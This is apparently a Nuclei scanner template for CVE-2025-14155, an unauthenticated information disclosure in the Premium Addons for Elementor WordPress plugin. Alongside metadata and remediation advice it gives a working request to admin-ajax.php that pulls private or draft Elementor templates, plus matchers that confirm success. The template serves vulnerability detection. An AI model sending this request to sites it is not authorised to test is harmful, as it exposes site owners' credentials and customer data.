id: CVE-2025-14155

info:
  name: Premium Addons for Elementor - Unauthenticated Information Disclosure
  author: DhiyaneshDk
  severity: medium
  description: |
    Premium Addons for Elementor plugin for WordPress version 4.11.53 and below contains an unauthenticated information disclosure vulnerability.The vulnerability exists due to a missing authorization check in the get_template_content() AJAX handler, allowing unauthenticated attackers to retrieve private, draft, and pending Elementor templates that may contain sensitive information such as API keys, credentials, customer data,or unpublished content.
  impact: |
    Unauthenticated attackers can view private and unpublished template content, leading to sensitive data disclosure.
  remediation: |
    Update to the latest version beyond 4.11.53.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14155
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/135c33bb-5ec2-4697-9340-1d2651ff3a0b?source=cve
    - https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/addons-integration.php#L1624
    - https://plugins.trac.wordpress.org/changeset/3416254/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-14155
    cwe-id: CWE-862
    epss-score: 0.0049
    epss-percentile: 0.65901
    cpe: cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: leap13
    product: premium_addons_for_elementor
    framework: wordpress
    publicwww-query: "/wp-content/plugins/premium-addons-for-elementor/"
  tags: cve,cve2025,wordpress,wp-plugin,premium-addons-elementor,unauth,disclosure,wp,vkev

variables:
  template_id: "{{rand_int(1, 100)}}"

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=get_elementor_template_content&templateID={{template_id}}&is_id=true HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"template_content"'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a00463044022012a4ab1353cb59308e13f7372757ef8acdaae653a93ebc9b214a3ad60883149402207af70dff6af50013db3f6f4fca3f9e45bb85a98ecd204664ea0b527bb7db0e9f:922c64590222798bb761d5b6d8e72950